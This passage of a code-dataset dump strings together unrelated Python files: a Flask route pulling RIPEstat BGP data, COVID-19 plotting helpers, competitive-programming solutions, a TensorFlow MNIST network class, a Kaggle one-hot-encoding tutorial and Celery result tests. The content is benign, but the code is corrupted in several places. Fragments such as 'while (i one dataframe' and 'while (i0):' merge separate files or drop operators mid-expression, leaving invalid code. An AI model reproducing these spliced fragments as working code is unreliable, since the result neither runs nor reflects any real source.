datetime.datetime.fromtimestamp(int(end_time))\n end = timestamp2.strftime('%Y-%m-%d %H:%M:%S')\n\n list_events = events[\"data\"][\"events\"]\n\n dict[\"events\"] = list_events\n\n dict[\"Start-time\"] = start\n\n dict[\"End-time\"] = end\n\n s = \"\"\n\n if not list_events:\n s = \"No outages occured while you were away\"\n mssg[\"outages\"] = s\n\n else:\n s = \"An Outage Occured\"\n mssg[\"outages\"] = s\n\n return mssg\n\n@app.route(\"/ml\")\ndef ML():\n adrr = get_tasks()\n adr=adrr['ip']\n #adr='94.187.8.0'\n sourceip = \"https://stat.ripe.net/data/whois/data.json?resource=\"+adr+\"%2F24\"\n responseip = requests.get(sourceip).json()\n a = responseip[\"data\"][\"irr_records\"][0][2][\"value\"]\n b=responseip[\"data\"][\"irr_records\"][0][1][\"value\"]\n if (any(c.isalpha() for c in a)==False):\n asn=a\n if (any(c.isalpha() for c in b)==False):\n asn=b\n url = \"https://stat.ripe.net/data/routing-history/data.json?min_peers=0&resource=\"+asn\n\n pref = responseip[\"data\"][\"records\"][0][0][\"value\"]\n pref=pref[0:(len(pref)-3)]\n url = 'https://stat.ripe.net/data/bgp-update-activity/data.json?endtime=2022-04-15T12%3A00%3A00&hide_empty_samples=false&max_samples=10000&resource='+pref+'&starttime=2021-04-29T00%3A00%3A00'\n r = requests.get(url)\n json = r.json()\n df = pd.DataFrame(json['data']['updates'])\n df.drop(\"starttime\", axis=1, inplace=True)\n r=df.shape[0]-1\n nb=df.iloc[r,0:2].values\n df = df.drop(df.shape[0]-1, axis=0)\n l=[]\n av=df[\"announcements\"].mean()\n l.append(int(df[\"announcements\"][0]>av))\n l.append(int(df[\"announcements\"][1]>av))\n i=2\n while (i one dataframe\n frame = pd.concat(ts, axis=1)\n\n frame['as_of_date'] = dfs[category].index.max()\n\n # exclude the two cruise ships\n mask = frame.index.isin({'Diamond Princess', 'Grand Princess'})\n frame = frame[~ mask]\n\n return frame\n\n\n\nstate_name_to_code = {\n 'California': 'CA',\n 'Connecticut': 'CT',\n 'Florida': 'FL',\n 'Illinois': 'IL',\n 'Louisiana': 'LA',\n 'Maryland': 'MA',\n 'Massachusetts': 'MA',\n 'Michigan': 'MI',\n 'New Jersey': 'NJ',\n 'New York': 'NY',\n 'Pennsylvania': 'PA',\n 'Texas': 'TX',\n}\n\n\n\ndef plot_count_vs_rate(data, category):\n fig, ax = plt.subplots(figsize=(10, 6))\n\n as_of = data['as_of_date'].iloc[0].strftime('%Y-%m-%d')\n x = category\n y = f'{category} per 100k'\n \n ax.scatter(data[x].values, data[y].values, alpha=0.5)\n\n ax.set(xlabel = x.title(),\n ylabel = y.title(),\n title = f'Number of {x.title()} vs. 
Number of {y.title()} as of {as_of}',\n )\n \n # add annotation for top 10 items\n for state in data[x].sort_values(ascending=False).index[0:10]:\n state_x = data.at[state, x]\n state_y = data.at[state, y]\n\n ax.annotate(state_name_to_code.get(state, state),\n xy=(state_x, state_y),\n xycoords='data',\n xytext=(5, 0),\n textcoords='offset points',\n #arrowprops=dict(facecolor='black', shrink=0.05),\n horizontalalignment='left',\n verticalalignment='center')\n\n return fig, ax\n\n\ndef plot_confirmed_vs_deaths(data):\n\n fig, ax = plt.subplots(figsize=(10, 6))\n \n as_of = data['as_of_date'].iloc[0].strftime('%Y-%m-%d')\n\n mask = data['deaths'] >= 10\n\n ax.scatter(data.loc[mask, 'confirmed'].values,\n data.loc[mask, 'deaths'].values,\n alpha=0.5)\n\n ax.set(xlabel='Number of Confirmed Cases',\n ylabel='Number of Deaths',\n xscale='log',\n yscale='log',\n title=f'Number of Confirmed Cases vs Number of Deaths as of {as_of}',\n )\n\n ax.annotate('for states reporting\\n10 or more deaths',\n xy=(1, 0),\n xycoords='axes fraction',\n xytext=(-20, 20),\n textcoords='offset pixels',\n horizontalalignment='right',\n verticalalignment='bottom',\n )\n \n # add annotation for top 10 items\n x = 'confirmed'\n y = 'deaths'\n \n for state in data[y].sort_values(ascending=False).index[0:10]:\n state_x = data.at[state, x]\n state_y = data.at[state, y]\n\n ax.annotate(state_name_to_code.get(state, state),\n xy=(state_x, state_y),\n xycoords='data',\n xytext=(5, 0),\n textcoords='offset points',\n #arrowprops=dict(facecolor='black', shrink=0.05),\n horizontalalignment='left',\n verticalalignment='center')\n\n \n return fig, ax\n\n\ndef plot_observations_vs_date(data, category):\n\n fig, ax = plt.subplots(figsize=(10, 6))\n\n top_10_states = (data[category]\n .sum(axis=1, level='Province_State')\n .iloc[-1]\n .sort_values(ascending=False)\n .index[0:10]\n )\n\n for state in top_10_states:\n t = data[category].sum(axis=1, level='Province_State').loc[:, state].loc[lambda x: x >= 10]\n ax.plot(t, label=state)\n\n ax.set(xlabel='Date',\n ylabel=f'Number of {category.title()}',\n yscale='log',\n title=f'Number of {category.title()}'\n )\n ax.get_xaxis().set_major_locator(mdates.DayLocator(interval=14))\n ax.get_xaxis().set_major_formatter(mdates.DateFormatter('%b %d'))\n\n ax.legend()\n\n return fig, ax\n\ndef plot_observations_vs_days(data, category):\n\n fig, ax = plt.subplots(figsize=(10, 6))\n\n top_10_states = (data[category]\n .sum(axis=1, level='Province_State')\n .iloc[-1]\n .sort_values(ascending=False)\n .index[0:10]\n )\n\n for state in top_10_states:\n t = (data[category]\n .sum(axis=1, level='Province_State')\n .loc[:, state]\n .loc[lambda x: x >= 10]\n .reset_index(drop=True)\n )\n ax.plot(t, label=state)\n\n ax.set(xlabel=f'Days since 10th {category.title()}',\n ylabel=f'Number of {category.title()}',\n yscale='log',\n title=f'Number of {category.title()}'\n )\n\n ax.legend()\n\n return fig, ax\n\n# counties in Southern California (So Cal)\nso_cal_counties = [\n 'Imperial',\n 'Kern',\n 'Los Angeles',\n 'Orange',\n 'Riverside',\n 'San Bernardino',\n 'San Diego',\n 'San Luis Obispo',\n 'Santa Barbara',\n 'Ventura',\n ]\n\ndef drop_level_inline(df):\n t = df.copy()\n t.columns = t.columns.droplevel(0)\n return t\n\ndef confirmed_cases_so_cal(data, category):\n fig, ax = plt.subplots(figsize=(10, 6))\n\n t = (data[category]\n .loc[:, ('California', so_cal_counties)]\n .pipe(drop_level_inline)\n )\n\n for county in t.columns:\n ax.plot(t[county].loc[lambda x: x >= 10], label=county)\n\n 
ax.set(xlabel='date',\n ylabel='# of Confirmed Cases',\n yscale='log',\n title='Confirmed Cases in Southern California',\n )\n\n ax.get_xaxis().set_major_locator(mdates.DayLocator(interval=14))\n ax.get_xaxis().set_major_formatter(mdates.DateFormatter('%b %d'))\n\n ax.legend()\n \n return fig, ax\n","repo_name":"jeffrey-smart/covid-19","sub_path":"src/covid_util.py","file_name":"covid_util.py","file_ext":"py","file_size_in_byte":10117,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"28666138428","text":"a,b,c = map(int, input().split())\n\nif b >= c:\n print(-1)\n exit()\n\nn = (a // (c -b)) + 1\nprint(n) \n\n\n# 손익분기점\n# 고정비용 A만원\n# 노트북 1대 생산 가변비용 B만원\n# 노트북 가격 C만원\n\n# 총 비용 = A + (B * n)\n# 이익 = C * n\n\n# https://www.acmicpc.net/problem/1712","repo_name":"Gajeju/Coding_test_Programming","sub_path":"bkackjoon/step/08_math_1/P01_1712.py","file_name":"P01_1712.py","file_ext":"py","file_size_in_byte":303,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"30691845521","text":"import sys\ninput = sys.stdin.readline\nfrom collections import deque\n\nt = int(input())\nfor c in range(t) : \n start, end = map(int, input().split())\n isVisit = [False] * 10000\n isVisit[start] = True\n path = [\"\"] * 10000\n q = deque()\n q.append(start)\n\n while q : \n tmp = q.popleft()\n\n # D *2\n op = (tmp*2) % 10000\n if not isVisit[op] :\n q.append(op)\n path[op] = path[tmp] + 'D'\n isVisit[op] = True\n\n # S -1\n op = (tmp-1) % 10000\n if not isVisit[op] :\n q.append(op)\n path[op] += path[tmp] + 'S'\n isVisit[op] = True\n\n # L <1\n op = (tmp % 1000) * 10 + tmp // 1000\n\n if not isVisit[op] :\n q.append(op)\n path[op] += path[tmp] + 'L'\n isVisit[op] = True\n \n # R >1\n op = (tmp % 10) * 1000 + tmp // 10\n\n if not isVisit[op] :\n q.append(op)\n path[op] += path[tmp] + 'R'\n isVisit[op] = True\n\n print(path[end])","repo_name":"SuperH0ng/algorithm","sub_path":"따로 푼 것/백준/백준 9019번(DSLR).py","file_name":"백준 9019번(DSLR).py","file_ext":"py","file_size_in_byte":1048,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"13401717381","text":"import matplotlib.pyplot as plt\nimport tensorflow as tf\nimport numpy as np\nfrom sklearn.metrics import confusion_matrix\nimport time\nfrom datetime import timedelta\nimport math\nimport scipy.ndimage\nfrom tensorflow.examples.tutorials.mnist import input_data\n\nclass network(object):\n def __init__(self):\n tf.reset_default_graph()\n self.test_batch_size = 256\n self.train_batch_size = 64\n self.total_iterations = 0\n\n def setup(self,load = None, structure=None,end_relu = False,end_biases = False, data = None, offset = 0, scale = 1):\n \"\"\"\n Creates a network\n load: the filepath of the network to load (must be compatible with \"structure\"), if none then a new network will be created\n structure: an array determining the type of network and the hidden structure of the network. The array has the shape:\n [size of filters/number of nodes, number of filters/MLP, use pooling/use_relu, use biases];\n If the second input is <=0 then the network will be a MPL, else it will be a ConvNet.\n the last two inputs get converted to boolean from 1 or 0; they determine if the layer has biases and pooling/ReLUs on the layer. (convnets always use ReLUs). There is a fully connected layer added by default at the end of the network, this should not be in the structure array.\n end_relu: determines if the final layer has a ReLU;\n end_biases: determines if the final layer has biases;\n data: none defaults to the MNIST dataset from the Tensorflow examples folder, but others can be used (supplying the MNIST dataset is quicker if it is already loaded);\n offset: puts an offset on all images coming into the network e.g -0.5 will make all MNIST images between -0.5 and 0.5 instead of 0 to 1\n scale: scales the input image by any value, applies before offset\n \n \"\"\"\n self.scale = scale\n self.offset = offset\n self.structure = structure\n self.data = data\n if (self.data is None):\n self.data = input_data.read_data_sets('data/MNIST/', one_hot=True)\n\n # We know that MNIST images are 28 pixels in each dimension.\n self.img_size = 28\n # Images are stored in one-dimensional arrays of this length.\n self.img_size_flat = self.img_size * self.img_size\n # Tuple with height and width of images used to reshape arrays.\n self.img_shape = (self.img_size, self.img_size)\n # Number of colour channels for the images: 1 channel for gray-scale.\n self.num_channels = 1\n # Number of classes, one class for each of 10 digits.\n self.num_classes = 10\n\n self.x = tf.placeholder(tf.float32, shape=[None, self.img_size_flat], name='x')\n self.scale_layer = tf.multiply(self.x,self.scale)\n self.offset_layer = tf.add(self.scale_layer,self.offset)\n self.x_image = tf.reshape(self.offset_layer, [-1, self.img_size, self.img_size, self.num_channels])\n self.y_true = tf.placeholder(tf.float32, shape=[None, self.num_classes], name='y_true')\n self.y_true_cls = tf.argmax(self.y_true, axis=1)\n\n self.layers = [tf.Tensor for i in range(self.structure.shape[0]+1)]\n self.weights = [tf.Variable for i in range(self.structure.shape[0]+1)]\n self.biases = [tf.Variable for i in range(self.structure.shape[0]+1)]\n\n i=0;\n while (i0):\n if (i==0):\n self.layers[i],self.weights[i],self.biases[i] =\\\n self.new_conv_layer(input=self.x_image,\n num_input_channels=self.num_channels,\n filter_size=self.filter_size,\n num_filters=self.num_filters,\n use_pooling=self.use_pooling,\n use_biases =self.use_biases)\n else:\n self.num_input_channels = self.structure[i-1,1]\n self.layers[i],self.weights[i],self.biases[i] 
=\\\n self.new_conv_layer(input=self.layers[i-1],\n num_input_channels=self.num_input_channels,\n filter_size=self.filter_size,\n num_filters=self.num_filters,\n use_pooling=self.use_pooling,\n use_biases =self.use_biases)\n i=i+1\n\n else:\n if (i==0):\n self.layer_flat, self.num_features = self.flatten_layer(self.x_image)\n self.layers[i],self.weights[i],self.biases[i] = self.new_fc_layer(input=self.layer_flat,\n num_inputs=self.num_features,\n num_outputs=self.filter_size,\n use_relu=self.use_pooling,\n use_biases =self.use_biases)\n else:\n if(self.structure[i-1,1]>0):\n self.image_flat, self.num_pixels = self.flatten_layer(self.layers[i-1])\n self.layers[i],self.weights[i],self.biases[i] = self.new_fc_layer(input=self.image_flat,\n num_inputs=self.num_pixels,\n num_outputs=self.filter_size,\n use_relu=self.use_pooling,\n use_biases =self.use_biases)\n\n else:\n self.layers[i],self.weights[i],self.biases[i] = self.new_fc_layer(input=self.layers[i-1],\n num_inputs=self.num_features,\n num_outputs=self.filter_size,\n use_relu=self.use_pooling,\n use_biases =self.use_biases)\n self.num_features = self.filter_size\n i=i+1\n\n if(self.structure[i-1,1]>0):\n self.layer_last,self.num_features = self.flatten_layer(self.layers[i-1])\n else:\n self.layer_last = self.layers[i-1]\n\n self.layers[i],self.weights[i],self.biases[i]= self.new_fc_layer(input=self.layer_last,\n num_inputs=self.num_features,\n num_outputs=self.num_classes,\n use_relu=end_relu,\n use_biases = end_biases)\n\n self.y_pred = tf.nn.softmax(self.layers[i])\n\n self.y_pred_cls = tf.argmax(self.y_pred, axis=1)\n\n self.cross_entropy = tf.nn.softmax_cross_entropy_with_logits(logits=self.layers[i],\n labels=self.y_true)\n self.cost = tf.reduce_mean(self.cross_entropy)\n self.optimizer = tf.train.AdamOptimizer(learning_rate=1e-4).minimize(self.cost)\n self.correct_prediction = tf.equal(self.y_pred_cls, self.y_true_cls)\n self.accuracy = tf.reduce_mean(tf.cast(self.correct_prediction, tf.float32))\n\n self.session = tf.Session()\n self.session.run(tf.global_variables_initializer())\n\n if (load is not None):\n if load==\"default\":\n load =\"./Models/MNIST_model\"\n self.session = tf.Session()\n self.saver = tf.train.Saver()\n self.saver.restore(self.session,load)\n\n def save(self,location = \"./Models/MNIST_model\"):\n \"\"\"\n saves the network at the given file path, defaults to \"./Models/MNIST_model\".\n \"\"\"\n self.saver = tf.train.Saver()\n self.saver.save(self.session, location)\n\n def plot_images(self,images, cls_true, cls_pred=None):\n \"\"\"\n plots 9 supplied images in a 3x3 grid, together with the true and predicted class labels. 
\n \"\"\"\n assert len(images) == len(cls_true) == 9\n\n # Create figure with 3x3 sub-plots.\n fig, axes = plt.subplots(3, 3)\n fig.subplots_adjust(hspace=0.3, wspace=0.3)\n\n for i, ax in enumerate(axes.flat):\n # Plot image.\n ax.imshow(images[i].reshape(self.img_shape), cmap='binary')\n\n # Show true and predicted classes.\n if self.cls_pred is None:\n xlabel = \"True: {0}\".format(self.cls_true[i])\n else:\n xlabel = \"True: {0}, Pred: {1}\".format(self.cls_true[i], self.cls_pred[i])\n\n # Show the classes as the label on the x-axis.\n ax.set_xlabel(xlabel)\n\n # Remove ticks from the plot.\n ax.set_xticks([])\n ax.set_yticks([])\n\n # Ensure the plot is shown correctly with multiple plots\n # in a single Notebook cell.\n plt.show()\n\n def new_weights(self,shape):\n return tf.Variable(tf.truncated_normal(shape, stddev=0.05))\n\n def new_biases(self,length):\n return tf.Variable(tf.constant(0.05, shape=[length]))\n\n def new_conv_layer(self,\n input, # The previous layer.\n num_input_channels, # Num. channels in prev. layer.\n filter_size, # Width and height of each filter.\n num_filters, # Number of filters.\n use_pooling=True,\n use_biases =True\n ):\n\n # Shape of the filter-weights for the convolution.\n # This format is determined by the TensorFlow API.\n shape = [filter_size, filter_size, num_input_channels, num_filters]\n\n # Create new weights aka. filters with the given shape.\n weights = self.new_weights(shape=shape)\n\n if(use_biases):\n # Create new biases, one for each filter.\n biases = self.new_biases(length=num_filters)\n else:\n biases = []\n\n # Create the TensorFlow operation for convolution.\n # Note the strides are set to 1 in all dimensions.\n # The first and last stride must always be 1,\n # because the first is for the image-number and\n # the last is for the input-channel.\n # But e.g. strides=[1, 2, 2, 1] would mean that the filter\n # is moved 2 pixels across the x- and y-axis of the image.\n # The padding is set to 'SAME' which means the input image\n # is padded with zeroes so the size of the output is the same.\n layer = tf.nn.conv2d(input=input,\n filter=weights,\n strides=[1, 1, 1, 1],\n padding='SAME')\n\n # Add the biases to the results of the convolution.\n # A bias-value is added to each filter-channel.\n if(use_biases):\n layer += biases\n\n # Use pooling to down-sample the image resolution?\n if use_pooling:\n # This is 2x2 max-pooling, which means that we\n # consider 2x2 windows and select the largest value\n # in each window. 
Then we move 2 pixels to the next window.\n layer = tf.nn.max_pool(value=layer,\n ksize=[1, 2, 2, 1],\n strides=[1, 2, 2, 1],\n padding='SAME')\n\n # Rectified Linear Unit (ReLU).\n # It calculates max(x, 0) for each input pixel x.\n # This adds some non-linearity to the formula and allows us\n # to learn more complicated functions.\n layer = tf.nn.relu(layer)\n\n # Note that ReLU is normally executed before the pooling,\n # but since relu(max_pool(x)) == max_pool(relu(x)) we can\n # save 75% of the relu-operations by max-pooling first.\n\n # We return both the resulting layer and the filter-weights\n # because we will plot the weights later.\n return layer, weights, biases\n\n def flatten_layer(self,layer):\n # Get the shape of the input layer.\n layer_shape = layer.get_shape()\n\n # The shape of the input layer is assumed to be:\n # layer_shape == [num_images, img_height, img_width, num_channels]\n\n # The number of features is: img_height * img_width * num_channels\n # We can use a function from TensorFlow to calculate this.\n num_features = layer_shape[1:4].num_elements()\n\n # Reshape the layer to [num_images, num_features].\n # Note that we just set the size of the second dimension\n # to num_features and the size of the first dimension to -1\n # which means the size in that dimension is calculated\n # so the total size of the tensor is unchanged from the reshaping.\n layer_flat = tf.reshape(layer, [-1, num_features])\n\n # The shape of the flattened layer is now:\n # [num_images, img_height * img_width * num_channels]\n\n # Return both the flattened layer and the number of features.\n return layer_flat, num_features\n\n def new_fc_layer(self,input, # The previous layer.\n num_inputs, # Num. inputs from prev. layer.\n num_outputs, # Num. outputs.\n use_relu=True,\n use_biases = True): # Use Rectified Linear Unit (ReLU)?\n\n # Create new weights and biases.\n weights = self.new_weights(shape=[num_inputs, num_outputs])\n if (use_biases):\n biases = self.new_biases(length=num_outputs)\n else:\n biases =[]\n # Calculate the layer as the matrix multiplication of\n # the input and weights, and then add the bias-values.\n if (use_biases):\n layer = tf.matmul(input, weights) + biases\n else:\n layer = tf.matmul(input, weights)\n # Use ReLU?\n if use_relu:\n layer = tf.nn.relu(layer)\n\n return layer,weights,biases\n\n def optimize(self,num_iterations):\n\n # Start-time used for printing time-usage below.\n start_time = time.time()\n\n for i in range(self.total_iterations,\n self.total_iterations + num_iterations):\n\n # Get a batch of training examples.\n # x_batch now holds a batch of images and\n # y_true_batch are the true labels for those images.\n x_batch, y_true_batch = self.data.train.next_batch(self.train_batch_size)\n\n # Put the batch into a dict with the proper names\n # for placeholder variables in the TensorFlow graph.\n feed_dict_train = {self.x: x_batch,\n self.y_true: y_true_batch}\n\n # Run the optimizer using this batch of training data.\n # TensorFlow assigns the variables in feed_dict_train\n # to the placeholder variables and then runs the optimizer.\n self.session.run(self.optimizer, feed_dict=feed_dict_train)\n\n # Print status every 100 iterations.\n if i % 100 == 0:\n # Calculate the accuracy on the training-set.\n acc = self.session.run(self.accuracy, feed_dict=feed_dict_train)\n\n # Message for printing.\n msg = \"Optimization Iteration: {0:>6}, Training Accuracy: {1:>6.1%}\"\n\n # Print it.\n print(msg.format(i + 1, acc))\n\n # Update the total number of 
iterations performed.\n self.total_iterations += num_iterations\n\n # Ending time.\n end_time = time.time()\n\n # Difference between start and end-times.\n time_dif = end_time - start_time\n\n # Print the time-usage.\n print(\"Time usage: \" + str(timedelta(seconds=int(round(time_dif)))))\n\n def plot_example_errors(self,cls_pred, correct):\n # This function is called from print_test_accuracy() below.\n\n # cls_pred is an array of the predicted class-number for\n # all images in the test-set.\n\n # correct is a boolean array whether the predicted class\n # is equal to the true class for each image in the test-set.\n\n # Negate the boolean array.\n incorrect = (correct == False)\n\n # Get the images from the test-set that have been\n # incorrectly classified.\n images = self.data.test.images[incorrect]\n\n # Get the predicted classes for those images.\n cls_pred = cls_pred[incorrect]\n\n # Get the true classes for those images.\n cls_true = self.data.test.cls[incorrect]\n\n # Plot the first 9 images.\n plot_images(images=images[0:9],\n cls_true=cls_true[0:9],\n cls_pred=cls_pred[0:9])\n\n def plot_confusion_matrix(self,cls_pred):\n # This is called from print_test_accuracy() below.\n\n # cls_pred is an array of the predicted class-number for\n # all images in the test-set.\n\n # Get the true classifications for the test-set.\n cls_true = self.data.test.cls\n\n # Get the confusion matrix using sklearn.\n cm = confusion_matrix(y_true=cls_true,\n y_pred=cls_pred)\n\n # Print the confusion matrix as text.\n print(cm)\n\n # Plot the confusion matrix as an image.\n plt.matshow(cm)\n\n # Make various adjustments to the plot.\n plt.colorbar()\n tick_marks = np.arange(self.num_classes)\n plt.xticks(tick_marks, range(self.num_classes))\n plt.yticks(tick_marks, range(self.num_classes))\n plt.xlabel('Predicted')\n plt.ylabel('True')\n\n # Ensure the plot is shown correctly with multiple plots\n # in a single Notebook cell.\n plt.show()\n\n # Split the test-set into smaller batches of this size.\n\n def print_test_accuracy(self,show_example_errors=False,\n show_confusion_matrix=False):\n # Number of images in the test-set.\n num_test = len(self.data.test.images)\n\n # Allocate an array for the predicted classes which\n # will be calculated in batches and filled into this array.\n cls_pred = np.zeros(shape=num_test, dtype=np.int)\n\n # Now calculate the predicted classes for the batches.\n # We will just iterate through all the batches.\n # There might be a more clever and Pythonic way of doing this.\n\n # The starting index for the next batch is denoted i.\n i = 0\n\n while i < num_test:\n # The ending index for the next batch is denoted j.\n j = min(i + self.test_batch_size, num_test)\n\n # Get the images from the test-set between index i and j.\n images = self.data.test.images[i:j, :]\n\n # Get the associated labels.\n labels = self.data.test.labels[i:j, :]\n\n # Create a feed-dict with these images and labels.\n feed_dict = {self.x: images,\n self.y_true: labels}\n\n # Calculate the predicted class using TensorFlow.\n cls_pred[i:j] = self.session.run(y_pred_cls, feed_dict=feed_dict)\n\n # Set the start-index for the next batch to the\n # end-index of the current batch.\n i = j\n\n # Convenience variable for the true class-numbers of the test-set.\n cls_true = self.data.test.cls\n\n # Create a boolean array whether each image is correctly classified.\n correct = (cls_true == cls_pred)\n\n # Calculate the number of correctly classified images.\n # When summing a boolean array, False means 0 and True 
means 1.\n correct_sum = correct.sum()\n\n # Classification accuracy is the number of correctly classified\n # images divided by the total number of images in the test-set.\n acc = float(correct_sum) / num_test\n\n # Print the accuracy.\n msg = \"Accuracy on Test-Set: {0:.1%} ({1} / {2})\"\n print(msg.format(acc, correct_sum, num_test))\n\n # Plot some examples of mis-classifications, if desired.\n if show_example_errors:\n print(\"Example errors:\")\n plot_example_errors(cls_pred=cls_pred, correct=correct)\n\n # Plot the confusion matrix, if desired.\n if show_confusion_matrix:\n print(\"Confusion Matrix:\")\n plot_confusion_matrix(cls_pred=cls_pred)\n\n def plot_conv_weights(self,weights, input_channel=0):\n # Assume weights are TensorFlow ops for 4-dim variables\n # e.g. weights_conv1 or weights_conv2.\n\n # Retrieve the values of the weight-variables from TensorFlow.\n # A feed-dict is not necessary because nothing is calculated.\n w = self.session.run(weights)\n\n # Get the lowest and highest values for the weights.\n # This is used to correct the colour intensity across\n # the images so they can be compared with each other.\n w_min = np.min(w)\n w_max = np.max(w)\n\n # Number of filters used in the conv. layer.\n num_filters = w.shape[3]\n\n # Number of grids to plot.\n # Rounded-up, square-root of the number of filters.\n num_grids = math.ceil(math.sqrt(num_filters))\n\n # Create figure with a grid of sub-plots.\n fig, axes = plt.subplots(num_grids, num_grids)\n\n # Plot all the filter-weights.\n for i, ax in enumerate(axes.flat):\n # Only plot the valid filter-weights.\n if i=0))\n R.append(np.diag(r))\n\n #combine the weights, bias and ReLU matrices to produce W and B matrices\n W = 1\n Btemp = biases.copy()\n for L in range (0,nlayers-nlayersmin):\n #print(W.shape)\n Btemp[-1-L] = (Btemp[-1-L]).dot(W)\n W= (R[-2-L]).dot(weights[-1-L]).dot(W)\n\n B = sum(Btemp)\n return W,B,y\n","repo_name":"AndrewLouw/Saliency-Comparison","sub_path":"Mnist_net.py","file_name":"Mnist_net.py","file_ext":"py","file_size_in_byte":32566,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"9972588677","text":"# Read the data\nimport pandas as pd\ntrain_data = pd.read_csv('../input/train.csv')\ntest_data = pd.read_csv('../input/test.csv')\n\n# Drop houses where the target is missing\ntrain_data.dropna(axis=0, subset=['SalePrice'], inplace=True)\n\ntarget = train_data.SalePrice\n\n# Since missing values isn't the focus of this tutorial, we use the simplest\n# possible approach, which drops these columns.\n# For more detail (and a better approach) to missing values, see\n# https://www.kaggle.com/dansbecker/handling-missing-values\ncols_with_missing = [col for col in train_data.columns\n if train_data[col].isnull().any()]\ncandidate_train_predictors = train_data.drop(['Id', 'SalePrice'] + cols_with_missing, axis=1)\ncandidate_test_predictors = test_data.drop(['Id'] + cols_with_missing, axis=1)\n\n# \"cardinality\" means the number of unique values in a column.\n# We use it as our only way to select categorical columns here. This is convenient, though\n# a little arbitrary.\nlow_cardinality_cols = [cname for cname in candidate_train_predictors.columns if\n candidate_train_predictors[cname].nunique() < 10 and\n candidate_train_predictors[cname].dtype == \"object\"]\nnumeric_cols = [cname for cname in candidate_train_predictors.columns if\n candidate_train_predictors[cname].dtype in ['int64', 'float64']]\nmy_cols = low_cardinality_cols + numeric_cols\ntrain_predictors = candidate_train_predictors[my_cols]\ntest_predictors = candidate_test_predictors[my_cols]\n\n\n\n#Let's see a random sample of dtypes from our prediction data:\ntrain_predictors.dtypes.sample(10)\n\n\n#Pandas offers a convenient function called **get_dummies** to get one-hot encodings\none_hot_encoded_training_predictors = pd.get_dummies(train_predictors)\n\n\n\n\nfrom sklearn.model_selection import cross_val_score\nfrom sklearn.ensemble import RandomForestRegressor\n\ndef get_mae(X, y):\n # multiple by -1 to make positive MAE score instead of neg value returned as sklearn convention\n return -1 * cross_val_score(RandomForestRegressor(50),\n X, y,\n scoring = 'neg_mean_absolute_error').mean()\n\npredictors_without_categoricals = train_predictors.select_dtypes(exclude=['object'])\n\nmae_without_categoricals = get_mae(predictors_without_categoricals, target)\n\nmae_one_hot_encoded = get_mae(one_hot_encoded_training_predictors, target)\n\nprint('Mean Absolute Error when Dropping Categoricals: ' + str(int(mae_without_categoricals)))\nprint('Mean Abslute Error with One-Hot Encoding: ' + str(int(mae_one_hot_encoded)))\n\none_hot_encoded_training_predictors = pd.get_dummies(train_predictors)\none_hot_encoded_test_predictors = pd.get_dummies(test_predictors)\nfinal_train, final_test = one_hot_encoded_training_predictors.align(one_hot_encoded_test_predictors,\n join='left',\n axis=1)\n","repo_name":"Yasaman1997/Machine_Learning","sub_path":"Kaggle_ML/Projects/predict housing prices/Handling Missing Values/Using Categorical Data with One Hot Encoding.py","file_name":"Using Categorical Data with One Hot Encoding.py","file_ext":"py","file_size_in_byte":3037,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"16"}
+{"seq_id":"3192457036","text":"# 演習0【前回の復習】\n# 整数を入力してもらう。\n# その整数が奇数の場合は「奇数です」と1度だけ出力する。\n# その整数が偶数の場合は「偶数です」と入力された数の回数出力する。\n# というプログラムを作成してください。\n# 例1)\n# 整数を入力してください:5\n# 結果:\n# 奇数です\nch = input(\"数字を入力してください\")\nnum = int(ch)\n\n# if num % 2 == 1:\n# print(\"奇数です\")\n# else:\n# print(\"偶数です\")\n\nif num % 2 == 0:\n count = num # 入力された値\n msg = \"偶数です\"\nelse:\n count = 1\n msg = \"奇数です\"\n\nfor i in range(count):\n print(msg)\n\n\n# 例2)\n# 整数を入力してください:4\n# 結果:\n# 偶数です\n# 偶数です\n# 偶数です\n# 偶数です\n# ch = input(\"整数を入力してください\")\n# num = int(ch)\n\n# if num % 2 == 1:\n# print(\"奇数です\" * num)\n# else:\n# print(\"偶数です\\n\" * num)\n\n\n# プログラムの流れも自分で考えてみましょう。\n# 難しい場合は、分かる部分からプログラムを書いてみましょう。\n","repo_name":"Masaru-DaL/School","sub_path":"term.1/PythonProgramming_a/2022.04.28/exercise0.py","file_name":"exercise0.py","file_ext":"py","file_size_in_byte":1128,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"71708571848","text":"from __future__ import absolute_import\n\nfrom contextlib import contextmanager\n\nfrom celery import states\nfrom celery.exceptions import IncompleteStream, TimeoutError\nfrom celery.five import range\nfrom celery.result import (\n AsyncResult,\n EagerResult,\n TaskSetResult,\n result_from_tuple,\n)\nfrom celery.utils import uuid\nfrom celery.utils.serialization import pickle\n\nfrom celery.tests.case import AppCase, Mock, depends_on_current_app, patch\n\n\ndef mock_task(name, state, result):\n return dict(id=uuid(), name=name, state=state, result=result)\n\n\ndef save_result(app, task):\n traceback = 'Some traceback'\n if task['state'] == states.SUCCESS:\n app.backend.mark_as_done(task['id'], task['result'])\n elif task['state'] == states.RETRY:\n app.backend.mark_as_retry(\n task['id'], task['result'], traceback=traceback,\n )\n else:\n app.backend.mark_as_failure(\n task['id'], task['result'], traceback=traceback,\n )\n\n\ndef make_mock_group(app, size=10):\n tasks = [mock_task('ts%d' % i, states.SUCCESS, i) for i in range(size)]\n [save_result(app, task) for task in tasks]\n return [app.AsyncResult(task['id']) for task in tasks]\n\n\nclass test_AsyncResult(AppCase):\n\n def setup(self):\n self.task1 = mock_task('task1', states.SUCCESS, 'the')\n self.task2 = mock_task('task2', states.SUCCESS, 'quick')\n self.task3 = mock_task('task3', states.FAILURE, KeyError('brown'))\n self.task4 = mock_task('task3', states.RETRY, KeyError('red'))\n\n for task in (self.task1, self.task2, self.task3, self.task4):\n save_result(self.app, task)\n\n @self.app.task(shared=False)\n def mytask():\n pass\n self.mytask = mytask\n\n def test_compat_properties(self):\n x = self.app.AsyncResult('1')\n self.assertEqual(x.task_id, x.id)\n x.task_id = '2'\n self.assertEqual(x.id, '2')\n\n def test_children(self):\n x = self.app.AsyncResult('1')\n children = [EagerResult(str(i), 